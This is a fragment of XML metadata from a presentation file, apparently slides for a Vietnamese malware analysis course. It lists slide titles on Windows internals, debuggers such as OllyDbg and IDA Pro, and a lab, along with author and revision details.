      <vt:lpstr>Malware vs. Windows OS</vt:lpstr>
      <vt:lpstr>Malware vs. Windows OS</vt:lpstr>
      <vt:lpstr>Malware vs. Windows OS</vt:lpstr>
      <vt:lpstr>Malware vs. Windows OS</vt:lpstr>
      <vt:lpstr>Malware vs. Windows OS</vt:lpstr>
      <vt:lpstr>Malware vs. Windows OS</vt:lpstr>
      <vt:lpstr>Malware vs. Windows OS</vt:lpstr>
      <vt:lpstr>Malware vs. Windows OS</vt:lpstr>
      <vt:lpstr>Malware vs. Windows OS</vt:lpstr>
      <vt:lpstr>Kernel vs. User mode</vt:lpstr>
      <vt:lpstr>Native API</vt:lpstr>
      <vt:lpstr>Practice [Lab07]</vt:lpstr>
      <vt:lpstr>Debugger</vt:lpstr>
      <vt:lpstr>Debugger</vt:lpstr>
      <vt:lpstr>OllyDbg</vt:lpstr>
      <vt:lpstr>OllyDbg</vt:lpstr>
      <vt:lpstr>IDA Pro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mã độc</dc:title>
  <dc:creator>TTS</dc:creator>
  <cp:lastModifiedBy>tran the son</cp:lastModifiedBy>
  <cp:revision>928</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2017-06-08T06:53:33Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-05-03T13:56:13Z</dcterms:modified>
</cp:coreProperties>
</file>